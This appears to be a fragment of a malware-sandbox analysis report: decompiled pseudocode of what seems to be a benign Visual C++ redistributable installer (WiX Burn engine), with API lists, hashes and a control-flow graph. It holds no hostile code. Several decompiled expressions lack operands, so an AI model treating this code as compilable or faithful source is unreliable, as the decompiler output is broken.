                                                                          														_t247 = 0x8007000d;
                                                                          														_t252 = 0x8007000d;
                                                                          														E000B37D3(_t136, "section.cpp", 0x92, 0x8007000d);
                                                                          														_push(_v384);
                                                                          														_push("Failed to read complete image section header, index: %u");
                                                                          														goto L62;
                                                                          													}
                                                                          													_t196 = GetLastError();
                                                                          													_t265 =  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
                                                                          													_t252 =  >=  ? 0x80004005 :  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
                                                                          													E000B37D3(0x80004005, "section.cpp", 0x84, _t252);
                                                                          													_push("Failed to seek past optional headers.");
                                                                          													goto L2;
                                                                          												}
                                                                          												_t199 = GetLastError();
                                                                          												_t268 =  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
                                                                          												_t252 =  >=  ? 0x80004005 :  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
                                                                          												E000B37D3(0x80004005, "section.cpp", 0x79, _t252);
                                                                          												_push("Failed to read signature size.");
                                                                          												goto L2;
                                                                          											}
                                                                          											_t202 = GetLastError();
                                                                          											_t271 =  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
                                                                          											_t252 =  >=  ? 0x80004005 :  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
                                                                          											E000B37D3(0x80004005, "section.cpp", 0x74, _t252);
                                                                          											_push("Failed to read signature offset.");
                                                                          											goto L2;
                                                                          										}
                                                                          										_t205 = GetLastError();
                                                                          										_t274 =  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
                                                                          										_t252 =  >=  ? 0x80004005 :  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
                                                                          										E000B37D3(0x80004005, "section.cpp", 0x6f, _t252);
                                                                          										_push("Failed to seek to section info.");
                                                                          										goto L2;
                                                                          									}
                                                                          								}
                                                                          								_t208 = GetLastError();
                                                                          								_t277 =  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
                                                                          								_t252 =  >=  ? 0x80004005 :  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
                                                                          								E000B37D3(0x80004005, "section.cpp", 0x5f, _t252);
                                                                          								_push("Failed to read NT header.");
                                                                          								goto L2;
                                                                          							}
                                                                          							_t211 = GetLastError();
                                                                          							_t280 =  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
                                                                          							_t252 =  >=  ? 0x80004005 :  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "section.cpp", 0x59, _t252);
                                                                          							_push("Failed to seek to NT header.");
                                                                          							goto L2;
                                                                          						}
                                                                          						_t214 = GetLastError();
                                                                          						_t283 =  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
                                                                          						_t252 =  >=  ? 0x80004005 :  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "section.cpp", 0x49, _t252);
                                                                          						_push("Failed to read DOS header.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_t217 = GetLastError();
                                                                          					_t286 =  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
                                                                          					_t252 =  >=  ? 0x80004005 :  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "section.cpp", 0x43, _t252);
                                                                          					_push("Failed to seek to start of file.");
                                                                          					goto L2;
                                                                          				} else {
                                                                          					_t220 = GetLastError();
                                                                          					_t289 =  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
                                                                          					_t252 =  >=  ? 0x80004005 :  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "section.cpp", 0x3a, _t252);
                                                                          					_push("Failed to open handle to engine process path.");
                                                                          					L2:
                                                                          					_push(_t252);
                                                                          					L68:
                                                                          					E000F012F();
                                                                          					L69:
                                                                          					return E000DDE36(_t223, _v8 ^ _t290, _t243, _t247, _t252);
                                                                          				}
                                                                          			}




























































                                                                          0x000bb5af
                                                                          0x000bb5b7
                                                                          0x000bb5bd
                                                                          0x000bb5c3
                                                                          0x000bb5c7
                                                                          0x000bb616
                                                                          0x000bb665
                                                                          0x000bb6ad
                                                                          0x000bb6b3
                                                                          0x000bb6b7
                                                                          0x000bb6f1
                                                                          0x000bb703
                                                                          0x000bb710
                                                                          0x000bba79
                                                                          0x000bba79
                                                                          0x000bba8a
                                                                          0x000bba94
                                                                          0x000bbaa2
                                                                          0x000bbaa7
                                                                          0x000bbaa8
                                                                          0x000bbaad
                                                                          0x000bbaae
                                                                          0x000bbaae
                                                                          0x00000000
                                                                          0x000bbab3
                                                                          0x000bb718
                                                                          0x000bb719
                                                                          0x000bb726
                                                                          0x000bb732
                                                                          0x000bb73d
                                                                          0x000bb746
                                                                          0x000bba17
                                                                          0x000bba27
                                                                          0x000bba29
                                                                          0x000bba2e
                                                                          0x00000000
                                                                          0x000bba2e
                                                                          0x000bb754
                                                                          0x000bb75e
                                                                          0x000bb768
                                                                          0x000bb772
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bb778
                                                                          0x00000000
                                                                          0x000bb780
                                                                          0x000bb787
                                                                          0x000bb7bd
                                                                          0x000bb7bf
                                                                          0x000bb7c7
                                                                          0x000bb7ed
                                                                          0x000bb7f8
                                                                          0x000bb800
                                                                          0x000bb84b
                                                                          0x000bb865
                                                                          0x000bb89c
                                                                          0x000bb8a8
                                                                          0x000bb8cf
                                                                          0x000bb91d
                                                                          0x000bb929
                                                                          0x000bb92c
                                                                          0x000bb933
                                                                          0x000bb93d
                                                                          0x000bb945
                                                                          0x000bb954
                                                                          0x000bb947
                                                                          0x000bb94d
                                                                          0x000bb94d
                                                                          0x000bb935
                                                                          0x000bb938
                                                                          0x000bb938
                                                                          0x000bb956
                                                                          0x000bb95f
                                                                          0x000bb968
                                                                          0x000bb971
                                                                          0x000bb97a
                                                                          0x000bb983
                                                                          0x000bb989
                                                                          0x000bb98f
                                                                          0x000bb995
                                                                          0x000bb99b
                                                                          0x000bb9a1
                                                                          0x000bb9af
                                                                          0x000bb9b1
                                                                          0x000bb9b6
                                                                          0x000bb9e1
                                                                          0x000bb9e6
                                                                          0x000bb9ee
                                                                          0x000bb9f7
                                                                          0x000bb9fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bba08
                                                                          0x000bba0d
                                                                          0x000bb835
                                                                          0x000bb835
                                                                          0x00000000
                                                                          0x000bb9b8
                                                                          0x000bb9b8
                                                                          0x000bb9c8
                                                                          0x000bb9ca
                                                                          0x000bb9cf
                                                                          0x000bb9d4
                                                                          0x000bb836
                                                                          0x000bb836
                                                                          0x000bba3f
                                                                          0x000bba41
                                                                          0x000bba43
                                                                          0x000bba4a
                                                                          0x000bba4a
                                                                          0x00000000
                                                                          0x000bba43
                                                                          0x000bb9b6
                                                                          0x000bb91f
                                                                          0x00000000
                                                                          0x000bb91f
                                                                          0x000bb8e1
                                                                          0x000bb8e3
                                                                          0x000bb8f7
                                                                          0x000bb8fc
                                                                          0x00000000
                                                                          0x000bb902
                                                                          0x000bb8aa
                                                                          0x000bb8ba
                                                                          0x000bb8bc
                                                                          0x000bb8c1
                                                                          0x000bba33
                                                                          0x000bba33
                                                                          0x000bba34
                                                                          0x000bba39
                                                                          0x00000000
                                                                          0x000bba39
                                                                          0x000bb867
                                                                          0x000bb878
                                                                          0x000bb882
                                                                          0x000bb890
                                                                          0x000bb895
                                                                          0x00000000
                                                                          0x000bb895
                                                                          0x000bb802
                                                                          0x000bb813
                                                                          0x000bb81d
                                                                          0x000bb82b
                                                                          0x000bb830
                                                                          0x00000000
                                                                          0x000bb830
                                                                          0x000bb7c9
                                                                          0x000bb7d9
                                                                          0x000bb7db
                                                                          0x000bb7e0
                                                                          0x000bb7e5
                                                                          0x00000000
                                                                          0x000bb7e5
                                                                          0x000bb789
                                                                          0x000bb799
                                                                          0x000bb79b
                                                                          0x000bb7a0
                                                                          0x000bb7a6
                                                                          0x000bba76
                                                                          0x000bba76
                                                                          0x00000000
                                                                          0x000bba76
                                                                          0x000bb732
                                                                          0x000bba54
                                                                          0x000bba64
                                                                          0x000bba66
                                                                          0x000bba6b
                                                                          0x000bba71
                                                                          0x00000000
                                                                          0x000bba71
                                                                          0x000bb6b9
                                                                          0x000bb6ca
                                                                          0x000bb6d4
                                                                          0x000bb6e2
                                                                          0x000bb6e7
                                                                          0x00000000
                                                                          0x000bb6e7
                                                                          0x000bb667
                                                                          0x000bb678
                                                                          0x000bb682
                                                                          0x000bb68d
                                                                          0x000bb692
                                                                          0x00000000
                                                                          0x000bb692
                                                                          0x000bb618
                                                                          0x000bb629
                                                                          0x000bb633
                                                                          0x000bb63e
                                                                          0x000bb643
                                                                          0x00000000
                                                                          0x000bb643
                                                                          0x000bb5c9
                                                                          0x000bb5da
                                                                          0x000bb5e4
                                                                          0x000bb5ef
                                                                          0x000bb5f4
                                                                          0x00000000
                                                                          0x000bb5f4
                                                                          0x000bb58e
                                                                          0x000bb552
                                                                          0x000bb563
                                                                          0x000bb56d
                                                                          0x000bb578
                                                                          0x000bb57d
                                                                          0x00000000
                                                                          0x000bb57d
                                                                          0x000bb503
                                                                          0x000bb514
                                                                          0x000bb51e
                                                                          0x000bb529
                                                                          0x000bb52e
                                                                          0x00000000
                                                                          0x000bb52e
                                                                          0x000bb4a0
                                                                          0x000bb4b1
                                                                          0x000bb4bb
                                                                          0x000bb4c6
                                                                          0x000bb4cb
                                                                          0x00000000
                                                                          0x000bb4cb
                                                                          0x000bb452
                                                                          0x000bb463
                                                                          0x000bb46d
                                                                          0x000bb478
                                                                          0x000bb47d
                                                                          0x00000000
                                                                          0x000bb3ff
                                                                          0x000bb3ff
                                                                          0x000bb410
                                                                          0x000bb41a
                                                                          0x000bb425
                                                                          0x000bb42a
                                                                          0x000bb42f
                                                                          0x000bb42f
                                                                          0x000bbaed
                                                                          0x000bbaed
                                                                          0x000bbaf4
                                                                          0x000bbb06
                                                                          0x000bbb06

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB3FF
                                                                          • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB44C
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB452
                                                                          • ReadFile.KERNELBASE(00000000,000B435C,00000040,?,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB49A
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB4A0
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB4FD
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB503
                                                                          • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB54C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB552
                                                                          • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB5C3
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB5C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$Pointer$Read
                                                                          • String ID: ($.wix$4$@Met$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                          • API String ID: 2600052162-807742151
                                                                          • Opcode ID: 4a58c443ee7a3228d529e3c6007d571e2e17bd474c31bad45ddfbf3f2f74799f
                                                                          • Instruction ID: 1b220c86fdb5ef984e47cc6ad8a2cba6fcd4916da83611b6a84b7ec0eb95054f
                                                                          • Opcode Fuzzy Hash: 4a58c443ee7a3228d529e3c6007d571e2e17bd474c31bad45ddfbf3f2f74799f
                                                                          • Instruction Fuzzy Hash: 2512B6B1A40329ABEB309A25CC45FFB76E9EF04700F114165FE09EB991DBB48D40DBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 401 b508d-b513b call df670 * 2 GetModuleHandleW call f03f0 call f05a2 call b1209 412 b513d 401->412 413 b5151-b5162 call b41d2 401->413 414 b5142-b514c call f012f 412->414 419 b516b-b5187 call b5525 CoInitializeEx 413->419 420 b5164-b5169 413->420 421 b53cc-b53d3 414->421 429 b5189-b518e 419->429 430 b5190-b519c call efbad 419->430 420->414 423 b53e0-b53e2 421->423 424 b53d5-b53db call f54ef 421->424 427 b5407-b5425 call bd723 call ca6d0 call ca91e 423->427 428 b53e4-b53eb 423->428 424->423 450 b5453-b5466 call b4e9c 427->450 451 b5427-b542f 427->451 428->427 432 b53ed-b5402 call f041b 428->432 429->414 438 b519e 430->438 439 b51b0-b51bf call f0cd1 430->439 432->427 441 b51a3-b51ab call f012f 438->441 448 b51c8-b51d7 call f29b3 439->448 449 b51c1-b51c6 439->449 441->421 458 b51d9-b51de 448->458 459 b51e0-b51ef call f343b 448->459 449->441 461 b5468 call f3911 450->461 462 b546d-b5474 450->462 451->450 453 b5431-b5434 451->453 453->450 456 b5436-b5451 call c416a call b550f 453->456 456->450 458->441 469 b51f8-b5217 GetVersionExW 459->469 470 b51f1-b51f6 459->470 461->462 465 b547b-b5482 462->465 466 b5476 call f2dd0 462->466 472 b5489-b5490 465->472 473 b5484 call f1317 465->473 466->465 475 b5219-b524c call b37d3 469->475 476 b5251-b5296 call b33d7 call b550f 469->476 470->441 478 b5492 call efcbc 472->478 479 b5497-b5499 472->479 473->472 475->441 501 b52a9-b52b9 call c7337 476->501 502 b5298-b52a3 call f54ef 476->502 478->479 483 b549b CoUninitialize 479->483 484 b54a1-b54a8 479->484 483->484 487 b54aa-b54ac 484->487 488 b54e3-b54ec call f000b 484->488 492 b54ae-b54b0 487->492 493 b54b2-b54b8 487->493 499 b54ee call b44e9 488->499 500 b54f3-b550c call f06f5 call dde36 488->500 497 b54ba-b54d3 call c3c30 call b550f 492->497 493->497 497->488 517 b54d5-b54dc call b550f 497->517 499->500 513 b52bb 501->513 514 b52c5-b52ce 501->514 502->501 513->514 518 b5396-b53ac call b4c33 
514->518 519 b52d4-b52d7 514->519 525 b54e1-b54e2 517->525 529 b53b8-b53ca 518->529 530 b53ae 518->530 522 b536e-b5381 call b49df 519->522 523 b52dd-b52e0 519->523 534 b5386-b538a 522->534 526 b52e2-b52e5 523->526 527 b5346-b5362 call b47e9 523->527 525->488 532 b531e-b533a call b4982 526->532 533 b52e7-b52ea 526->533 527->529 541 b5364 527->541 529->421 530->529 532->529 543 b533c 532->543 537 b52fb-b530e call b4b80 533->537 538 b52ec-b52f1 533->538 534->529 539 b538c 534->539 537->529 545 b5314 537->545 538->537 539->518 541->522 543->527 545->532
                                                                          C-Code - Quality: 69%
                                                                          			E000B508D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
                                                                          				signed int _v8;
                                                                          				signed short _v16;
                                                                          				struct _OSVERSIONINFOW _v292;
                                                                          				signed int _v296;
                                                                          				intOrPtr _v304;
                                                                          				signed short _v308;
                                                                          				intOrPtr _v312;
                                                                          				WCHAR* _v316;
                                                                          				WCHAR* _v320;
                                                                          				WCHAR* _v324;
                                                                          				WCHAR* _v328;
                                                                          				signed short* _v332;
                                                                          				char _v340;
                                                                          				char _v344;
                                                                          				signed short _v420;
                                                                          				intOrPtr _v576;
                                                                          				intOrPtr _v1316;
                                                                          				char _v1332;
                                                                          				signed short _v1340;
                                                                          				char _v1404;
                                                                          				intOrPtr _v1532;
                                                                          				intOrPtr _v1544;
                                                                          				signed short _v1564;
                                                                          				char _v1588;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t70;
                                                                          				void* _t83;
                                                                          				signed short _t85;
                                                                          				signed short _t87;
                                                                          				signed short _t88;
                                                                          				signed short _t89;
                                                                          				signed short _t90;
                                                                          				signed short _t91;
                                                                          				signed short _t93;
                                                                          				signed short _t99;
                                                                          				signed short _t101;
                                                                          				intOrPtr _t124;
                                                                          				signed short _t131;
                                                                          				signed short _t133;
                                                                          				signed short _t134;
                                                                          				signed short _t137;
                                                                          				signed short _t144;
                                                                          				signed short _t148;
                                                                          				void* _t149;
                                                                          				void* _t156;
                                                                          				signed short _t159;
                                                                          				signed short _t162;
                                                                          				signed short _t167;
                                                                          				signed short _t170;
                                                                          				signed int _t171;
                                                                          				void* _t172;
                                                                          				void* _t173;
                                                                          
                                                                          				_t156 = __edx;
                                                                          				_t149 = __ecx;
                                                                          				_t70 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t70 ^ _t171;
                                                                          				_t148 = 0;
                                                                          				_t157 = _a8;
                                                                          				_v304 = _a4;
                                                                          				_v332 = _a20;
                                                                          				_v312 = _a12;
                                                                          				_v328 = 0;
                                                                          				_v324 = 0;
                                                                          				_v320 = 0;
                                                                          				_v316 = 0;
                                                                          				E000DF670(_a8,  &_v292, 0, 0x11c);
                                                                          				_v296 = 0;
                                                                          				_v308 = 0;
                                                                          				E000DF670(_a8,  &_v1588, 0, 0x4e8);
                                                                          				_t173 = _t172 + 0x18;
                                                                          				E000F03F0(GetModuleHandleW(0));
                                                                          				E000F05A2(3, 0);
                                                                          				_t83 = E000B1209(_t149, _a12,  &_v344,  &_v340); // executed
                                                                          				if(_t83 >= 0) {
                                                                          					_t85 = E000B41D2(_t149, _t156, __eflags,  &_v1588, _t157); // executed
                                                                          					_t162 = _t85;
                                                                          					__eflags = _t162;
                                                                          					if(_t162 >= 0) {
                                                                          						_v1544 = _a16;
                                                                          						_t87 = E000B5525();
                                                                          						__imp__CoInitializeEx(0, 0); // executed
                                                                          						_t162 = _t87;
                                                                          						__eflags = _t162;
                                                                          						if(_t162 >= 0) {
                                                                          							_t159 = 1;
                                                                          							_t88 = E000EFBAD();
                                                                          							__eflags = _t88;
                                                                          							if(_t88 >= 0) {
                                                                          								_v328 = 1;
                                                                          								_t89 = E000F0CD1();
                                                                          								_t164 = _t89;
                                                                          								__eflags = _t89;
                                                                          								if(__eflags >= 0) {
                                                                          									_v324 = 1;
                                                                          									_t90 = E000F29B3(_t149, _t156, _t164, __eflags); // executed
                                                                          									__eflags = _t90;
                                                                          									if(_t90 >= 0) {
                                                                          										_v320 = 1;
                                                                          										_t91 = E000F343B(_t90);
                                                                          										__eflags = _t91;
                                                                          										if(_t91 >= 0) {
                                                                          											_v316 = 1;
                                                                          											_v292.dwOSVersionInfoSize = 0x11c;
                                                                          											_t93 = GetVersionExW( &_v292);
                                                                          											__eflags = _t93;
                                                                          											if(_t93 != 0) {
                                                                          												E000B33D7( &_v296, 0);
                                                                          												_push(_v296);
                                                                          												_push(_v16 & 0x0000ffff);
                                                                          												_push(_v292.dwBuildNumber);
                                                                          												_push(_v292.dwMinorVersion);
                                                                          												_push(_v292.dwMajorVersion);
                                                                          												E000B550F(2, 0x20000001, "3.10.4.4718");
                                                                          												_t173 = _t173 + 0x20;
                                                                          												__eflags = _v296;
                                                                          												if(__eflags != 0) {
                                                                          													E000F54EF(_v296);
                                                                          													_t36 =  &_v296;
                                                                          													 *_t36 = _v296 & 0;
                                                                          													__eflags =  *_t36;
                                                                          												}
                                                                          												_t99 = E000C7337(_t156, __eflags,  &_v1588); // executed
                                                                          												_t167 = _t99;
                                                                          												__eflags = _t167;
                                                                          												if(_t167 >= 0) {
                                                                          													_t101 = _v420;
                                                                          													__eflags = _t101;
                                                                          													if(_t101 == 0) {
                                                                          														_t167 = E000B4C33(_t156, _v312,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															L38:
                                                                          															_t150 = _v332;
                                                                          															_t148 = _v1564;
                                                                          															 *_v332 = _v1340;
                                                                          															goto L39;
                                                                          														}
                                                                          														_push("Failed to run untrusted mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t131 = _t101 - 1;
                                                                          													__eflags = _t131;
                                                                          													if(_t131 == 0) {
                                                                          														_v308 = _t159;
                                                                          														_t133 = E000B49DF(_t149, _t156, _v304,  &_v1588); // executed
                                                                          														_t167 = _t133;
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run per-user mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t134 = _t131 - 1;
                                                                          													__eflags = _t134;
                                                                          													if(_t134 == 0) {
                                                                          														_t167 = E000B47E9(_t149, _t156, _v304, _v312,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run per-machine mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t137 = _t134 - 1;
                                                                          													__eflags = _t137;
                                                                          													if(_t137 == 0) {
                                                                          														_v308 = _t159;
                                                                          														_t167 = E000B4982(_t149, _t156, _v304,  &_v1588);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run embedded mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													__eflags = _t137 == 1;
                                                                          													if(_t137 == 1) {
                                                                          														_t167 = E000B4B80(_t149,  &_v1332, _a16);
                                                                          														__eflags = _t167;
                                                                          														if(_t167 >= 0) {
                                                                          															goto L38;
                                                                          														}
                                                                          														_push("Failed to run RunOnce mode.");
                                                                          														goto L9;
                                                                          													}
                                                                          													_t167 = 0x8000ffff;
                                                                          													_push("Invalid run mode.");
                                                                          													goto L9;
                                                                          												} else {
                                                                          													_push("Failed to initialize core.");
                                                                          													L9:
                                                                          													E000F012F();
                                                                          													_t150 = _t167;
                                                                          													goto L39;
                                                                          												}
                                                                          											}
                                                                          											_t144 = GetLastError();
                                                                          											__eflags = _t144;
                                                                          											_t170 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
                                                                          											__eflags = _t170;
                                                                          											_t167 =  >=  ? 0x80004005 : _t170;
                                                                          											E000B37D3(0x80004005, "engine.cpp", 0x95, _t167);
                                                                          											_push("Failed to get OS info.");
                                                                          											goto L9;
                                                                          										}
                                                                          										_push("Failed to initialize XML util.");
                                                                          										goto L9;
                                                                          									}
                                                                          									_push("Failed to initialize Wiutil.");
                                                                          									goto L9;
                                                                          								}
                                                                          								_push("Failed to initialize Regutil.");
                                                                          								goto L9;
                                                                          							}
                                                                          							_push("Failed to initialize Cryputil.");
                                                                          							goto L9;
                                                                          						}
                                                                          						_push("Failed to initialize COM.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_push("Failed to initialize engine state.");
                                                                          					goto L2;
                                                                          				} else {
                                                                          					_push("Failed to parse command line.");
                                                                          					L2:
                                                                          					E000F012F();
                                                                          					_t150 = _t162;
                                                                          					_t159 = _t148;
                                                                          					L39:
                                                                          					if(_v296 != 0) {
                                                                          						E000F54EF(_v296);
                                                                          					}
                                                                          					if(_t167 < 0 && _v576 == 0) {
                                                                          						E000F041B(_t150, _t156, _t159, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
                                                                          					}
                                                                          					E000BD723( &_v1404); // executed
                                                                          					E000CA6D0(_t150, _t156, _v1316); // executed
                                                                          					E000CA91E();
                                                                          					if(_t148 != 0) {
                                                                          						_t124 = _v1532;
                                                                          						if(_t124 != 0 && _t124 != 6) {
                                                                          							E000B550F(2, 0xa0000008, E000C416A(_t124));
                                                                          							_t173 = _t173 + 0xc;
                                                                          							_t167 = 0x80070bc2;
                                                                          							_t148 = 0;
                                                                          						}
                                                                          					}
                                                                          					E000B4E9C(_t148, _t150, _t159,  &_v1588);
                                                                          					if(_v316 != 0) {
                                                                          						E000F3911();
                                                                          					}
                                                                          					if(_v320 != 0) {
                                                                          						E000F2DD0();
                                                                          					}
                                                                          					if(_v324 != 0) {
                                                                          						E000F1317();
                                                                          					}
                                                                          					if(_v328 != 0) {
                                                                          						E000EFCBC();
                                                                          					}
                                                                          					if(_t159 != 0) {
                                                                          						__imp__CoUninitialize(); // executed
                                                                          					}
                                                                          					if(_v308 != 0) {
                                                                          						if(_t167 >= 0) {
                                                                          							_t159 =  *_v332;
                                                                          						} else {
                                                                          							_t159 = _t167;
                                                                          						}
                                                                          						_push(E000C3C30(_t148));
                                                                          						E000B550F(2, 0x20000007, _t159); // executed
                                                                          						if(_t148 != 0) {
                                                                          							_push(0xa0000005);
                                                                          							E000B550F(); // executed
                                                                          							_t150 = 2;
                                                                          						}
                                                                          					}
                                                                          					E000F000B(_t150, _t159, 0);
                                                                          					_t193 = _t148;
                                                                          					if(_t148 != 0) {
                                                                          						E000B44E9(_t156); // executed
                                                                          					}
                                                                          					E000F06F5(_t150, _t159, _t193, 0);
                                                                          					return E000DDE36(_t148, _v8 ^ _t171, _t156, _t159, _t167);
                                                                          				}
                                                                          			}


























































                                                                          0x000b52a3
                                                                          0x000b52b0
                                                                          0x000b52b5
                                                                          0x000b52b7
                                                                          0x000b52b9
                                                                          0x000b52cb
                                                                          0x000b52cb
                                                                          0x000b52ce
                                                                          0x000b53a8
                                                                          0x000b53aa
                                                                          0x000b53ac
                                                                          0x000b53b8
                                                                          0x000b53b8
                                                                          0x000b53c4
                                                                          0x000b53ca
                                                                          0x00000000
                                                                          0x000b53ca
                                                                          0x000b53ae
                                                                          0x00000000
                                                                          0x000b53ae
                                                                          0x000b52d4
                                                                          0x000b52d4
                                                                          0x000b52d7
                                                                          0x000b5374
                                                                          0x000b5381
                                                                          0x000b5386
                                                                          0x000b5388
                                                                          0x000b538a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b538c
                                                                          0x00000000
                                                                          0x000b538c
                                                                          0x000b52dd
                                                                          0x000b52dd
                                                                          0x000b52e0
                                                                          0x000b535e
                                                                          0x000b5360
                                                                          0x000b5362
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5364
                                                                          0x00000000
                                                                          0x000b5364
                                                                          0x000b52e2
                                                                          0x000b52e2
                                                                          0x000b52e5
                                                                          0x000b5324
                                                                          0x000b5336
                                                                          0x000b5338
                                                                          0x000b533a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b533c
                                                                          0x00000000
                                                                          0x000b533c
                                                                          0x000b52e7
                                                                          0x000b52ea
                                                                          0x000b530a
                                                                          0x000b530c
                                                                          0x000b530e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5314
                                                                          0x00000000
                                                                          0x000b5314
                                                                          0x000b52ec
                                                                          0x000b52f1
                                                                          0x00000000
                                                                          0x000b52bb
                                                                          0x000b52bb
                                                                          0x000b51a3
                                                                          0x000b51a4
                                                                          0x000b51aa
                                                                          0x00000000
                                                                          0x000b51aa
                                                                          0x000b52b9
                                                                          0x000b5219
                                                                          0x000b5228
                                                                          0x000b522a
                                                                          0x000b5232
                                                                          0x000b5234
                                                                          0x000b5242
                                                                          0x000b5247
                                                                          0x00000000
                                                                          0x000b5247
                                                                          0x000b51f1
                                                                          0x00000000
                                                                          0x000b51f1
                                                                          0x000b51d9
                                                                          0x00000000
                                                                          0x000b51d9
                                                                          0x000b51c1
                                                                          0x00000000
                                                                          0x000b51c1
                                                                          0x000b519e
                                                                          0x00000000
                                                                          0x000b519e
                                                                          0x000b5189
                                                                          0x00000000
                                                                          0x000b5189
                                                                          0x000b5164
                                                                          0x00000000
                                                                          0x000b513d
                                                                          0x000b513d
                                                                          0x000b5142
                                                                          0x000b5143
                                                                          0x000b5149
                                                                          0x000b514a
                                                                          0x000b53cc
                                                                          0x000b53d3
                                                                          0x000b53db
                                                                          0x000b53db
                                                                          0x000b53e2
                                                                          0x000b5402
                                                                          0x000b5402
                                                                          0x000b540e
                                                                          0x000b5419
                                                                          0x000b541e
                                                                          0x000b5425
                                                                          0x000b5427
                                                                          0x000b542f
                                                                          0x000b5444
                                                                          0x000b5449
                                                                          0x000b544c
                                                                          0x000b5451
                                                                          0x000b5451
                                                                          0x000b542f
                                                                          0x000b545a
                                                                          0x000b5466
                                                                          0x000b5468
                                                                          0x000b5468
                                                                          0x000b5474
                                                                          0x000b5476
                                                                          0x000b5476
